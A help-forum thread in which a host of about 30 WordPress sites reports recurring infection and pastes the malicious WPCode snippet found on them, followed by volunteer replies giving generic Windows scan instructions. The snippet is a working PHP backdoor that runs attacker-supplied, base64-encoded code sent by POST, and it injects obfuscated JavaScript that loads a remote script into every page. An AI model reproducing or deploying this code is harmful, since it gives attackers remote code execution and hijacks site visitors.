I need help - Wordpress Malware

Good morning everyone,

 

I am stumped by this one. I am hosting about 30 sites on a hostinger account. They are all running wordpress. I noticed a few nights ago that one of the sites was redirecting to spam and i started investigating. When I logged in to that site I noticed that wpcode snippets was installed and there were several new admin users, Crander, wp_update-1719330159, and wp_cron1719330159. The php snippet is called "Wordpress Snippet" and contains the following code. 

 

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "<script>var _0x3ec646=_0x38c3;(function(_0x2be3b3,_0x4eaeab){var _0x383697=_0x38c3,_0x8113a5=_0x2be3b3();while(!![]){try{var _0x351603=parseInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}</script>";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} 

 

I then began checking the other sites that I host and all of them have the same problem which is where I am stumped. Over the weekend, I restored every site to the oldest backups I had and setup wordfence and 2FA on each one.  I came back this morning to check on them and each site is back to having the code snippets installed and the additional user accounts. I am now running malware scans with Quttera and malcure but In all my years of using wordpress I've never had a problem like this and don't even know where to start. 

 

Please help. 

Greetings and to BleepingComputer's Virus/Trojan/Spyware/Malware Removal forum.

My name is Oh My! and I am here to help you! Now that we are "friends" please call me Gary.

===================================================

Ground Rules:

• First, please keep in mind most of us at BleepingComputer volunteer our assistance for your benefit in your time of need. Please try to match our commitment to you with your patience toward us.
• It is important to not run any tools or take any steps other than those I will provide for you.
• Please perform all steps in the order they are listed. If things are not clear or you experience problems be sure to stop and let me know.
• Please copy and paste all logs into your post unless otherwise requested.
• When your computer is clean I will let you know, provide instructions to remove tools and reports, and offer you information about how you can combat future infections.
• If you do not reply to your topic after 5 days I will assume it has been abandoned and I will close it.

===================================================

Now that I am assisting you, you can expect that I will be very responsive to your situation. If you are able, I would request you check this thread at least once per day so that we can try to resolve your issues effectively and efficiently. If you are going to be delayed please be considerate and let me know.

Thank you for your patience thus far. I am not familiar with Wordpress but let's see what we can do.

Please do this.

===================================================

Farbar Recovery Scan Tool (FRST)

--------------------

• Download Farbar Recover Scan Tool for 64 bit systems and note where the file is saved (Desktop, Downloads, etc.) <<< Important
• If your computer language is other than English right click on the FRST64 icon and rename it to FRST64english
• Right click on the icon and select Run as administrator
• Note: If you receive any warning about the download it is a false positive and you can ignore it. Click on More info to get the Run anyway option
• Click Yes to the disclaimer
• Click Scan and allow the program to run
• Click OK on the Scan complete screen, then OK on the Addition.txt pop up screen
• 2 Notepad documents should now be open on your desktop.
• Please copy and paste the contents of each report in separate reply windows

===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it.

• FRST.txt
• Addition.txt

I don't have access to a windows computer to be able to perform this. Is there a mac or docker alternative?

I would recommend you visit Malwarebytes Mac Malware Removal Help & Support Forum.

Are we all set?